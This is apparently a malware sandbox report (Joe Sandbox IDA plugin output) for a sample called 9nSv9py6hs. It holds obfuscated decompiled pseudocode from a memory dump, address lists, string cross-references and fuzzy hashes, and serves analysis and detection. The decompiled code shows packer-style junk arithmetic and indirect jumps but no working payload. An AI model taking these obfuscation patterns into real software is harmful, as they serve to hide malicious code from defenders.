0x0062c4d1
0x0062c4d8
0x0062c4d8
0x00000000
0x0062c4d8
0x0062c488
0x00000000
0x00000000
0x0062c49b
0x00000000
0x00000000
0x0062c4a3
0x00000000
0x0062c4a3
0x0062c42b
0x0062c431
0x00000000
0x0062c431
0x0062c40e
0x0062c4f7
0x0062c4f8
0x0062c4fb
0x0062c4fb
0x0062c50f
0x0062c511
0x0062c511
0x0062c52a
0x0062c52d
0x0062c536
0x0062c53b
0x0062c547
0x0062c548
0x0062c553
0x0062c559
0x0062c559
0x0062c021
0x0062c02b
0x0062c055
0x0062c057
0x00000000
0x00000000
0x0062c059
0x00000000
0x0062c059
0x0062c02d
0x0062c048
0x0062c053
0x00000000
0x00000000
0x00000000

Strings

CreateDisc.dll, xrefs: 0062C139
api-ms-win-core-memory-l1-1-0.dll, xrefs: 0062C3A8
NetMessageNameGetInfo, xrefs: 0062C15C, 0062C43B
Heap32ListNext, xrefs: 0062C3ED
f", xrefs: 0062C24D
Policy.6.0.Microsoft.Ink.dll, xrefs: 0062C0C9
d3d10core.dll, xrefs: 0062C1F7
H0, xrefs: 0062C53E
GetDlgItem, xrefs: 0062C05E, 0062C44A

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: CreateDisc.dll$GetDlgItem$Heap32ListNext$NetMessageNameGetInfo$Policy.6.0.Microsoft.Ink.dll$api-ms-win-core-memory-l1-1-0.dll$d3d10core.dll$H0$f"
API String ID: 0-3122717240
Opcode ID: 115c9ce44ccd92d87494692a6b246a0bee8b7ead96968d22c28e73c32e1b31cc
Instruction ID: cebb3eb4a63ffc60b5dea7faf86232e18b4843eb8fdbccaf0c7a113e17a2cc3d
Opcode Fuzzy Hash: 115c9ce44ccd92d87494692a6b246a0bee8b7ead96968d22c28e73c32e1b31cc
Instruction Fuzzy Hash: CFE1277AA00B118FCB05DFB9FCA06DE7BB3EB69361F04526EC945A77A1D6300905CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00611207 Relevance: 10.4, Strings: 8, Instructions: 430
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E00611207(void* __ecx, signed int __edx, void* __esi) {
				signed short* _t48;
				signed short* _t52;
				signed short* _t54;
				signed short* _t57;
				signed short* _t66;
				signed short* _t68;
				signed short* _t74;
				signed short* _t88;
				signed short* _t110;
				signed short* _t141;
				signed short* _t142;
				signed short* _t147;
				signed int _t151;
				signed short* _t156;
				void* _t160;
				unsigned int _t200;
				short _t202;
				signed int _t209;
				signed int _t210;
				signed char _t211;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t225;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed short** _t235;
				unsigned int _t237;
				void* _t239;
				signed short _t245;
				signed int _t246;
				void* _t248;
				void* _t249;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t255;
				void* _t256;
				void* _t257;
				void* _t263;
				void* _t267;
				short _t270;
				void* _t271;
				void* _t287;
				short _t288;
				signed short _t289;
				void* _t294;

				_t151 = __edx;
				_t48 =  *(_t294 - 0x10);
				_pop(_t232);
				_t233 = _t232 + 0xa0;
				_t263 = __esi + __esi;
				_push(_t233);
				_t234 = _t233 & 0x000000ea;
				 *0x6581c6 = __edx;
				if((__edx & 0x00000093) > 0) {
					_t151 = 0xa018;
					 *0x659e61 =  *0x659e61 - _t263;
					 *0x65afd6 = _t48;
					 *0x65aa8e =  *0x65aa8e - _t234;
					 *0x65afda =  *0x65afda + _t48;
					 *0x65afc6 =  *0x65afc6 + _t48;
					 *0x6587e5 = _t48;
				}
				 *0x65afdb = _t48;
				_t66 =  *(_t294 - 8);
				 *(_t294 - 8) = _t66;
				_t235 = _t48;
				_t52 =  *_t235;
				if(_t52 != 0) {
					 *(_t294 - 8) = _t66;
					_t68 =  *(_t294 - 8);
					_t52 = _t52 +  *((intOrPtr*)(_t294 + 8));
					_push(_t235);
					if(_t52 == 0x14) {
						L6:
						 *0x65afd6 = _t52;
						 *0x65afd8 = _t52;
					} else {
						 *0x65afca =  *0x65afca;
						if(_t68 > 0x3b22) {
							 *0x658148 = 0x4a404c;
							 *0x6581b0 =  *0x6581b0 - _t151;
							_t151 = 0;
							goto L6;
						}
					}
					 *0x65afdb = _t52;
					 *(_t294 - 8) = _t68;
					 *0x658198 = 0x735f;
					_pop(_t237);
					_t141 =  *(_t237 + 4);
					while(_t141 != 0) {
						_push(_t237);
						_t156 = _t52;
						 *(_t294 - 8) = _t68;
						if(_t68 < _t68) {
							_t156 = _t156 - 0x60f1;
							 *0x65afcf =  *0x65afcf + _t141;
							 *0x65818c = _t141;
						}
						 *0x658212 =  &(_t156[0x45]);
						_t142 = _t141;
						_pop(_t239);
						 *(_t294 - 8) = _t142;
						_push( *_t52);
						 *(_t294 - 0x10) =  *(_t294 - 8);
						_t54 = _t52;
						 *0x65afdc = _t54;
						 *(_t294 - 0xc) = _t54;
						_t267 = _t239;
						_t52 =  *(_t294 - 0xc);
						_t68 =  *(_t294 - 0x10);
						_t245 = _t52[2];
						_t160 = _t245;
						_t141 =  *(_t294 - 8) - _t160;
						_t237 = _t245 - 8;
						if(_t237 == 0) {
							continue;
						} else {
							_t246 = _t237 >> 1;
							 *0x659d99 =  *0x659d99 + _t267;
							_push(_t267);
							_push(_t246);
							if((_t246 & 0x000000e6) < 0) {
								 *0x658589 = _t52;
							}
							 *(_t294 - 8) = _t68;
							 *0x6590c9 = _t141;
							_pop(_t248);
							_pop(_t270);
							_t74 =  *(_t294 - 8);
							_t52 =  &(_t52[6]);
							 *0x65afd8 = _t52;
							_push(_t248);
							_t249 = _t248;
							 *0x6580d8 =  *0x6580d8 - _t74;
							 *(_t294 - 8) =  *(_t294 - 8) + _t74;
							if(_t141 <= _t141) {
								L17:
								 *0x658230 = _t270;
								 *0x6583f1 =  *0x6583f1 - _t249 - _t270;
								 *0x65851d = _t52;
								goto L18;
							} else {
								if(_t141 == _t141) {
									L18:
									 *0x65afca =  *0x65afca - _t74;
									_pop(_t251);
									_t200 = ( *_t52 & 0x0000ffff) >> 0xc;
									 *(_t294 - 8) = _t74;
									 *0x6592ed =  *0x6592ed - _t141;
									 *(_t294 - 0xc) = _t141;
									 *0x658204 = _t200;
									 *0x658270 =  *0x658270 - _t270;
									 *0x65828c =  *0x65828c - _t270;
									 *0x65afdc = _t52;
									 *0x658ab9 =  !0x1b1a61;
									 *0x6590b5 = _t141;
									 *0x65afdb = _t52;
									_t252 = _t251;
									_t271 = _t270;
									_t202 = _t200;
									_t88 =  *(_t294 - 8);
									_t147 =  *(_t294 - 0xc);
									if(_t202 != 3) {
										L35:
										_push(_t271);
										_push(_t252);
										_t253 = _t252 - 0xe458;
										 *(_t294 - 8) = _t88;
										 *0x6596ed =  *0x6596ed + _t147;
										 *0x65afd1 =  *0x65afd1 + _t202;
										_push(_t147);
										 *0x658347 =  *0x658347 + 0x9797;
										_push(_t202);
										_push(_t52);
										 *0x65a62b =  *0x65a62b + 0x9797 + _t202 - 0xc6e5 + _t253 - 0x9e1b88;
										_push(0);
										_push(_t253);
										_push(0x6117d5);
										goto __edi;
									}
									_push(_t271);
									_push(_t252);
									 *(_t294 - 8) = _t88;
									_push(_t147);
									_push(_t202);
									 *0x658230 = _t202;
									 *0x65afda = _t52;
									_t255 = _t252 + _t252;
									 *(_t294 - 0xc) = _t52;
									if(0x98206 >= 0) {
										L22:
										L23:
										 *0x658d71 = 0x324059;
										 *0x65afcf =  *0x65afcf + _t147;
										if(_t147 >= _t147) {
										}
										 *0x65afd9 = _t57;
										_pop(_t147);
										_pop(_t256);
										_pop(_t287);
										_t52 =  *(_t294 - 0xc);
										_push( *_t52 & 0x0000ffff);
										_push(_t287);
										_t288 = _t287 + 1;
										 *0x65afd9 = _t52;
										 *0x65afc6 = _t52;
										_t110 = _t52;
										_push(_t256);
										 *0x65afdc = _t52;
										if(_t256 >= 0x48006) {
											 *0x658f45 =  &(_t110[0x3c35]);
										}
										if(_t147 <= _t147) {
											 *0x659665 =  *0x659665 - _t147;
											 *0x658238 = _t288;
											 *0x65afda = _t52;
											 *0x658589 = _t52;
										}
										_t88 =  *(_t294 - 8);
										_pop(_t257);
										_pop(_t289);
										_pop(_t209);
										_t210 = _t209 & 0x00000fff;
										_push(_t210);
										_t211 = _t210 + 0x9f;
										_push(_t289);
										if((_t289 & 0x0000b490) == 0) {
											L33:
											 *0x65820e = _t211;
											goto L34;
										} else {
											 *0x65afda = _t52;
											_t225 = "sbeio.dll" - _t52;
											if(_t52 <= 0x1c866b) {
												 *(_t294 - 8) =  *(_t294 - 8) - _t88;
												_t225 = 0x5ee1;
												 *0x658170 = _t147;
											}
											_t211 = _t225 + _t225;
											if((_t211 & 0x00000090) < 0) {
												L34:
												 *0x65afd9 = _t52;
												_pop(_t271);
												_pop(_t218);
												_t219 = _t218 +  *((intOrPtr*)(_t294 + 8));
												 *0x6581e2 =  *0x6581e2 - _t219;
												_t220 = _t219;
												_t202 = _t220 + _t271;
												_t252 = _t257;
												 *0x658601 =  *0x658601 - _t88;
												goto L35;
											} else {
												goto L33;
											}
										}
									}
									 *0x65afdb = _t52;
									_t57 = _t52;
									if(_t255 >= 0) {
										goto L23;
									}
									 *0x65801c =  *0x65801c - _t57;
									goto L22;
								}
								goto L17;
							}
						}
						L37:
					}
				}
				asm("popad");
				return _t52;
				goto L37;
			}

0x00611207
0x0061120e
0x00611220
0x00611221
0x00611227
0x0061122b
0x0061122c
0x00611244
0x0061124e
0x00611250
0x00611254
0x0061125a
0x00611266
0x0061126c
0x00611276
0x0061127c
0x0061127c
0x00611294
0x0061129d
0x006112a3
0x006112a9
0x006112aa
0x006112ae
0x006112b4
0x006112b9
0x006112bc
0x006112c6
0x006112c9
0x006112fa
0x006112ff
0x00611305
0x006112cb
0x006112d0
0x006112db
0x006112e2
0x006112f0
0x006112f7
0x00000000
0x006112f7
0x006112db
0x00611313
0x0061132a
0x0061133d
0x00611347
0x00611348
0x0061134b
0x00611360
0x00611361
0x00611366
0x0061136b
0x0061136d
0x00611372
0x00611378
0x00611378
0x00611382
0x00611394
0x00611395
0x0061139b
0x006113a1
0x006113ad
0x006113c1
0x006113c2
0x006113ce
0x006113df
0x006113e0
0x006113e3
0x006113e9
0x006113ed
0x006113ee
0x006113f8
0x006113fc
0x00000000
0x00611402
0x00611402
0x00611404
0x0061140a
0x0061140e
0x00611419
0x0061141b
0x0061141b
0x0061144b
0x0061144e
0x00611474
0x00611475
0x00611476
0x00611481
0x00611483
0x00611491
0x00611492
0x006114aa
0x006114b1
0x006114ba
0x006114c2
0x006114cd
0x006114e7
0x006114ed
0x00000000
0x006114bc
0x006114be
0x006114f8
0x006114fe
0x00611504
0x00611508
0x0061150b
0x00611514
0x0061151a
0x00611521
0x0061152d
0x00611534
0x00611543
0x00611555
0x00611564
0x00611574
0x00611581
0x00611582
0x00611583
0x00611584
0x00611587
0x0061158d
0x00611754
0x00611754
0x00611755
0x00611756
0x0061175b
0x0061176c
0x00611772
0x00611790
0x006117a5
0x006117af
0x006117bc
0x006117bd
0x006117c6
0x006117c8
0x006117c9
0x006117d3
0x006117d3
0x00611593
0x00611596
0x0061159c
0x006115a3
0x006115a7
0x006115a8
0x006115b8
0x006115bf
0x006115c3
0x006115c9
0x00000000
0x006115e1
0x006115e6
0x006115f3
0x006115fb
0x006115fb
0x0061160f
0x0061161c
0x0061161d
0x0061161e
0x0061161f
0x00611631
0x00611638
0x0061163b
0x0061163c
0x0061164e
0x00611653
0x00611655
0x00611656
0x00611661
0x00611671
0x00611671
0x00611684
0x00611686
0x00611696
0x006116a6
0x006116ae
0x006116ae
0x006116bc
0x006116bf
0x006116c0
0x006116c1
0x006116c2
0x006116c8
0x006116c9
0x006116cc
0x006116d2
0x00611715
0x00611715
0x00000000
0x006116d4
0x006116da
0x006116ec
0x006116f3
0x006116fb
0x00611702
0x00611706
0x00611706
0x0061170d
0x00611713
0x0061171c
0x00611725
0x0061173e
0x0061173f
0x00611740
0x00611744
0x0061174b
0x0061174f
0x00611751
0x00611752
0x00000000
0x00000000
0x00000000
0x00000000
0x00611713
0x006116d2
0x006115cb
0x006115d0
0x006115d4
0x00000000
0x00000000
0x006115d6
0x00000000
0x006115d6
0x00000000
0x006114c0
0x006114ba
0x00000000
0x006113fc
0x0061134b
0x0061182a
0x0061182c
0x00000000

Strings

srcore.dll, xrefs: 00611236
tx6, xrefs: 006115E6
Heap32ListNext, xrefs: 00611287
winresume.exe, xrefs: 0061175E
RtlIpv4StringToAddressW, xrefs: 0061142C
Y@2, xrefs: 006115E1
ncobjapi.dll, xrefs: 00611320
sbeio.dll, xrefs: 006116E7

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: Heap32ListNext$RtlIpv4StringToAddressW$Y@2$ncobjapi.dll$sbeio.dll$srcore.dll$tx6$winresume.exe
API String ID: 0-1216483895
Opcode ID: fca28d1910ba99f27a398a502d41b5384b6731d63efd8cb3fbf8d2f407f41f2c
Instruction ID: 3bc0f183fdadb0f644af6d924713e19800a1bfecfc70d02cf4e210b8169e424b
Opcode Fuzzy Hash: fca28d1910ba99f27a398a502d41b5384b6731d63efd8cb3fbf8d2f407f41f2c
Instruction Fuzzy Hash: 8BE15376A047028FC700CFB9FC946C97FB3EBAA722F08926EC554A7BA5D6310945C761

Uniqueness

Uniqueness Score: -1.00%

Function 005D7755 Relevance: 8.9, Strings: 7, Instructions: 150COMMON

Download Yara Rule

Strings

CreateDisc.dll, xrefs: 005D7831
api-ms-win-core-memory-l1-1-0.dll, xrefs: 005D78BA
IEShims.dll, xrefs: 005D789D
LdrHotPatchRoutine, xrefs: 005D7786
findnetprinters.dll, xrefs: 005D7768
VarFormatDateTime, xrefs: 005D7807
GetDlgItem, xrefs: 005D78FE

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: CreateDisc.dll$GetDlgItem$IEShims.dll$LdrHotPatchRoutine$VarFormatDateTime$api-ms-win-core-memory-l1-1-0.dll$findnetprinters.dll
API String ID: 0-1397356366
Opcode ID: 29b149ce66a9a694be6075bfbc27601eb8b838928f2c36619dab3f2bc72a0f98
Instruction ID: ef95eb995b35b57f07fbb0a6c857ba5078f54379c3af0ca0d8947bf28f6e12fa
Opcode Fuzzy Hash: 29b149ce66a9a694be6075bfbc27601eb8b838928f2c36619dab3f2bc72a0f98
Instruction Fuzzy Hash: 8D512575B1070A9FCB00EFA8E8D16CDBBB2FB28321F50517AA944E7751E2745A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 005FB2A8 Relevance: 3.9, Strings: 3, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E005FB2A8(signed int __ecx, signed int __edx, signed int __edi) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _t23;
				signed int _t24;
				intOrPtr _t26;
				char _t31;
				char _t35;
				intOrPtr _t74;
				short _t77;
				short _t79;
				intOrPtr _t82;
				intOrPtr _t84;
				signed short _t90;
				intOrPtr _t91;
				signed int _t95;
				void* _t98;

				_t95 = __edi;
				_t76 = __ecx;
				_t23 =  *0x65afd6; // 0x3d
				 *0x65afd9 = _t23;
				_t24 = _t23 + _t23;
				if((__edx & 0x00008a19) > 0) {
					L10:
					_t26 =  *0x65afdc; // -49
					 *0x6584fd =  *0x6584fd - _t26;
					 *0x65afc7 =  *0x65afc7 - _t26;
					_v20 = 0x33b1de;
					_t77 =  *0x658128; // 0x47f1
					 *0x658176 = _t77;
					_t90 = 0x905e;
					 *0x65afd3 =  *0x65afd3 - 0x905e;
					 *0x65a7d9 =  *0x65a7d9 - _t98;
					 *0x65afd9 = 0xc3;
					_t31 =  *0x65afda; // -82
					 *0x658765 =  *0x658765 + ((_t95 | 0x000000e2) & 0x00ce53b0);
					_t24 = _t31 - 0x000000f3 + _t31 - 0x000000f3 - 0x00000001 | 0x00002307;
					_v16 = _v16 + _v24;
					 *0x65812a =  *0x65812a + 0x49d884;
					_t79 = 0;
				} else {
					_t91 =  *0x65821c; // 0x9a40
					_t90 = _t91 - 0xa9a3;
					_t101 = 0;
					if(0 < 0) {
						 *0x65afdb = _t24;
						_t74 = _v16;
						_v20 = _v20 + _t74;
						_v20 = _t74;
						_t76 = __ecx ^ 0x0000005d;
						 *0x65afcf =  *0x65afcf - _t76;
						 *0x65817e = _t76;
						_t90 = 0;
						_t101 = 0xb55d6d;
						 *0x65a9c2 =  *0x65a9c2 + __edi;
						 *0x658459 = 0xf6;
						_t24 = "CreateDisc.dll";
					}
					 *0x65814e = _t76;
					_t82 =  *0x658182; // 0xafcd
					_t79 = _t82 - 0x7c6b;
					if((_t90 & 0x0000a3d7) <= 0) {
						L8:
						_t35 = 0x2abfde;
						 *0x6580b6 =  *0x6580b6 - 0x4c3b6a;
						 *0x658154 = _t79;
						_t84 =  *0x6581a4; // 0x8003
						goto L9;
					} else {
						if((_t101 & 0x00a11685) <= 0) {
							_t98 = _t101 + _t101;
							 *0x65873d =  *0x65873d - _t95;
							_t95 = _t95 + _t95;
							_t24 = "GetProcessorSystemCycleTime" & 0x0029cfff;
							_v24 = 0x7d1dac;
							_t84 = 0x626210;
							 *0x6581a0 = 0;
							if((_t90 & 0x00008559) > 0) {
								_t90 = 0x9d00;
								 *0x65afda = 0xd8;
								_t95 = _t95 + _t95;
								_t35 =  *0x65afdb; // 0x5c
								if(_t95 == 0) {
									 *0x658018 =  *0x658018 + _t35;
									 *0x6585d9 = _t35;
									goto L8;
								}
								L9:
								 *0x6581f4 = _t90;
								 *0x65afd8 = _t35;
								_t95 = _t95 + 1;
								 *0x658068 =  *0x658068 - 0x1678f6;
								 *0x658084 =  *0x658084 - 0x1678f6;
								_v24 = _t84;
								 *0x6581be = _t90;
								 *0x65afd6 = 0x1678f6;
								_t24 = 0x2cf1ec;
								_t98 = 0x658298;
							}
							goto L10;
						}
					}
				}
				 *0x6581c8 = _t90;
				return _t24;
			}

0x005fb2a8
0x005fb2a8
0x005fb2ae
0x005fb2b4
0x005fb2ba
0x005fb2c1
0x005fb496
0x005fb4a4
0x005fb4aa
0x005fb4b0
0x005fb4bf
0x005fb4c7
0x005fb4ce
0x005fb4dc
0x005fb4e0
0x005fb4ed
0x005fb4f3
0x005fb4fb
0x005fb504
0x005fb510
0x005fb515
0x005fb522
0x005fb529
0x005fb2ca
0x005fb2ca
0x005fb2d1
0x005fb2d8
0x005fb2dd
0x005fb2df
0x005fb2f6
0x005fb2f9
0x005fb2fc
0x005fb2ff
0x005fb302
0x005fb308
0x005fb313
0x005fb31c
0x005fb322
0x005fb332
0x005fb33b
0x005fb340
0x005fb34a
0x005fb351
0x005fb358
0x005fb365
0x005fb3ff
0x005fb3ff
0x005fb404
0x005fb414
0x005fb41d
0x00000000
0x005fb36b
0x005fb371
0x005fb377
0x005fb384
0x005fb38b
0x005fb39a
0x005fb3a6
0x005fb3ae
0x005fb3b4
0x005fb3c0
0x005fb3cd
0x005fb3de
0x005fb3e3
0x005fb3e6
0x005fb3ee
0x005fb3f0
0x005fb3f7
0x00000000
0x005fb3fc
0x005fb424
0x005fb424
0x005fb436
0x005fb444
0x005fb451
0x005fb458
0x005fb46b
0x005fb478
0x005fb488
0x005fb48e
0x005fb490
0x005fb490
0x00000000
0x005fb3c0
0x005fb371
0x005fb365
0x005fb535
0x005fb53d

Strings

GetProcessorSystemCycleTime, xrefs: 005FB395
CreateDisc.dll, xrefs: 005FB33B
ncobjapi.dll, xrefs: 005FB2EE

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: CreateDisc.dll$GetProcessorSystemCycleTime$ncobjapi.dll
API String ID: 0-796990342
Opcode ID: 07a3bc2d922573c23301431b6cdd2ae9cf50e6a2b4cee10017155459aa828fe1
Instruction ID: 2879cc1521e0dfd49678c5907424b937e9b32ce46602d845fdf237f31c7b1a32
Opcode Fuzzy Hash: 07a3bc2d922573c23301431b6cdd2ae9cf50e6a2b4cee10017155459aa828fe1
Instruction Fuzzy Hash: A751E7BA9147428FC701DFB8EC542D53F73FB39312F042669C9A4A7B62E6350506CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00612335 Relevance: 3.9, Strings: 3, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00612335(void* __eax, signed int __ecx, signed int __edx, signed int __edi, void* __esi) {
				intOrPtr _t12;
				char _t17;
				intOrPtr _t20;
				char _t25;
				intOrPtr _t28;
				signed int _t35;
				signed int _t40;
				short _t42;
				short _t43;
				signed int _t45;
				signed int _t46;
				signed int _t52;
				void* _t57;
				signed short _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edi;
				_t35 = __ecx;
				_t12 = __eax + 0x65897d;
				if((__edx & 0x00008433) <= 0) {
					_t25 = _t12 - 0xce;
					 *0x658705 =  *0x658705 - __edi;
					 *0x65afdb =  *0x65afdb + _t25;
					 *0x65afdb = _t25;
					if(__edi <= 0x65ca7) {
					}
					_t12 =  *((intOrPtr*)(_t61 - 8));
					 *((intOrPtr*)(_t61 - 8)) = 0x37dc77;
					_t28 = 0x6fb8ee;
					_t40 = _t35 + 0x5e41;
					 *0x658184 = _t40;
					_t35 = _t40 ^ 0x00007d5c;
				}
				_t42 =  *0x6581d4; // 0x1
				 *0x658226 = _t42;
				_t43 = _t42 - _t12;
				_t58 = _t57 - 0xa9009b;
				_push( *0x65876f);
				 *0x658068 =  *0x658068 -  *0x6584cd - 0x18f3;
				L005B26E5( *0x6584cd - 0x18f3, _t28, _t52, _t58, 1,  *0x6584cd - 0x18f3);
				if(_t28 <= 0x39) {
					L7:
					_t45 = _t43 + 0x8fd8;
					 *0x65822e = _t45;
					_t46 = _t45 & _t58;
					if((_t58 & 0x0000b6a4) < 0) {
						L10:
						 *((intOrPtr*)(_t61 - 8)) = _t28;
						_t28 = 0x4fe2db;
						 *0x65815c = _t35;
						_t35 = _t35 + _t35 + _t35 + _t35;
						goto L11;
					}
					_t58 = _t58;
					_t52 = 0xca;
					if(0xca < 0x92c45) {
						goto L12;
					}
					goto L10;
				} else {
					if(_t28 > _t28) {
						L11:
						_t46 = 0x8861;
						L12:
						 *0x6581f8 = _t46;
						_t17 = 0xb3;
						_push( *0x658126);
						 *0x65afda =  *0x65afda - 0xb3;
						if(0xb3 != 0) {
							L17:
							 *0x658753 =  *0x658753 - (_t52 & 0x00c2e6bd) - 0xc9f8ff;
							 *0x65afdc = _t17;
							_t19 = "IEShims.dll";
							if(0 < 0x3cab && 0 == 0) {
								 *((intOrPtr*)(_t61 - 0xc)) =  *((intOrPtr*)(_t61 - 0xc)) + _t35;
							}
							L20:
							 *0x6598e5 =  *0x6598e5 - _t46;
							_push(E006124E9);
							_push(E0064F3FD);
							return _t19;
						}
						_t19 = 0xfc;
						if(0xfc >= 0xb0c03) {
							goto L20;
						}
						 *0x658042 =  *0x658042 - 0xfc;
						_t20 =  *0x65893d; // 0x0
						if("VarFormatDateTime" + "VarFormatDateTime" >= "VarFormatDateTime" + "VarFormatDateTime") {
							 *0x65817c = _t35;
							_t35 =  *0x6581b0; // 0x13ea
							_t46 = 0;
						}
						_t17 = _t20 + 0xbd;
						 *0x65afd9 = _t17;
						goto L17;
					}
					_t28 = _t28 + _t35;
					_t35 =  *0x65813e; // 0x66ce
					 *0x6581a6 = _t43;
					goto L7;
				}
			}

0x00612335
0x00612335
0x00612335
0x00612335
0x00612341
0x0061234e
0x00612351
0x00612358
0x0061235e
0x0061236b
0x0061236b
0x00612371
0x00612379
0x0061237c
0x00612383
0x00612386
0x0061238d
0x0061238d
0x00612393
0x0061239a
0x006123a1
0x006123a3
0x006123ab
0x006123bb
0x006123c5
0x006123cd
0x006123e3
0x006123e8
0x006123eb
0x006123f2
0x006123f9
0x00612417
0x00612417
0x0061241f
0x00612424
0x0061242d
0x00000000
0x0061242d
0x006123fd
0x00612408
0x0061240f
0x00000000
0x00000000
0x00000000
0x006123cf
0x006123d1
0x00612430
0x00612430
0x00612434
0x00612434
0x0061243e
0x00612445
0x0061244c
0x00612454
0x0061249a
0x006124a6
0x006124ad
0x006124b9
0x006124c5
0x006124cb
0x006124cb
0x006124d1
0x006124d6
0x006124de
0x006124e3
0x006124e8
0x006124e8
0x00612456
0x0061245d
0x00000000
0x00000000
0x0061245f
0x00612466
0x00612477
0x00612479
0x00612480
0x0061248d
0x0061248f
0x00612491
0x00612494
0x00000000
0x00612494
0x006123d3
0x006123d5
0x006123dc
0x00000000
0x006123dc

Strings

9, xrefs: 006123CA
IEShims.dll, xrefs: 006124B9
VarFormatDateTime, xrefs: 0061246E

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: 9$IEShims.dll$VarFormatDateTime
API String ID: 0-1106750433
Opcode ID: eea349a4aaca48226803c26728f77607a73345704261c8accf53aee8c6a31a0f
Instruction ID: 8b0f53b059c8e38361e2e8f81fd7d0e72f8acc275929b6fcae7d4e37456e4e26
Opcode Fuzzy Hash: eea349a4aaca48226803c26728f77607a73345704261c8accf53aee8c6a31a0f
Instruction Fuzzy Hash: 9A41266AA507438FDB10DF78EC652D43BB3EB29311F086129D854A7F72EA78058AC725

Uniqueness

Uniqueness Score: -1.00%

Function 005F64EE Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

api-ms-win-core-memory-l1-1-0.dll, xrefs: 005F6528

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: api-ms-win-core-memory-l1-1-0.dll
API String ID: 0-2549000205
Opcode ID: 2c9f1d1e1ef470c1f408bf9d24b8a0579b1380933675db362c3f470eb61e3eb9
Instruction ID: 78d216da80f0284627f885a493101459a581ee7641c4a22deb74fe43b81ebf58
Opcode Fuzzy Hash: 2c9f1d1e1ef470c1f408bf9d24b8a0579b1380933675db362c3f470eb61e3eb9
Instruction Fuzzy Hash: CA410EB2A0574A8FCB02DFF8E8846ED7F72FB29301F085069CA49A7722E7784500CB41

Uniqueness

Uniqueness Score: -1.00%

Function 005FD2D9 Relevance: 2.6, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E005FD2D9() {
				intOrPtr _t16;
				intOrPtr _t17;
				char _t18;
				char _t19;
				char _t24;
				intOrPtr _t26;
				signed int _t34;
				signed int _t35;
				void* _t37;
				void* _t50;

				 *((intOrPtr*)(_t50 - 8)) = _t16;
				if(_t34 <= _t34) {
				}
				_t17 =  *0x65afc7; // -84
				 *0x658a35 = _t17;
				_t18 =  *((intOrPtr*)(_t50 - 8));
				_t26 =  *((intOrPtr*)(_t50 - 0xc));
				if((_t34 & 0x00000083) == 0) {
					 *0x65afd6 = _t18;
					 *0x65afdb = _t18;
					_t26 = 0x5c39dc;
				}
				_t35 =  !_t34;
				 *0x658196 = _t35;
				_push(0);
				 *((intOrPtr*)(_t50 - 8)) =  *((intOrPtr*)(_t50 - 8)) - _t26;
				 *((intOrPtr*)(_t50 - 8)) = _t26;
				 *((intOrPtr*)(_t50 - 8)) = _t18;
				_t37 = _t35 - 0x63 + 0x771c;
				_t19 =  *((intOrPtr*)(_t50 - 8));
				_push( *((intOrPtr*)(_t50 - 0x18)));
				 *0x65afd9 = _t19;
				 *((intOrPtr*)(_t50 - 8)) = _t19;
				_push(1);
				E005F96AD();
				if(_t37 > _t37) {
					if(_t37 > _t37) {
						_t37 = _t37 + 0x8039;
						_t24 = _t19 + 0xb2;
						 *0x65afd8 = _t24;
						if(0 == 0) {
							 *0x65afdc = _t24;
						}
						 *0x658909 = 0x10effb;
					}
					 *0x6581ae = 0;
				}
				 *0x65abde =  *0x65abde;
				_push(0x5fd3d3);
				goto ( *0x658dbd);
			}

0x005fd2e2
0x005fd2e7
0x005fd2e7
0x005fd2eb
0x005fd2f0
0x005fd2f7
0x005fd2fa
0x005fd300
0x005fd302
0x005fd30d
0x005fd31f
0x005fd31f
0x005fd321
0x005fd323
0x005fd32c
0x005fd32d
0x005fd330
0x005fd336
0x005fd339
0x005fd33e
0x005fd341
0x005fd346
0x005fd34b
0x005fd34e
0x005fd350
0x005fd357
0x005fd35b
0x005fd35d
0x005fd365
0x005fd368
0x005fd376
0x005fd378
0x005fd378
0x005fd382
0x005fd387
0x005fd3a0
0x005fd3a7
0x005fd3b7
0x005fd3c2
0x005fd3cd

Strings

srcore.dll, xrefs: 005FD38F
f", xrefs: 005FD382

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

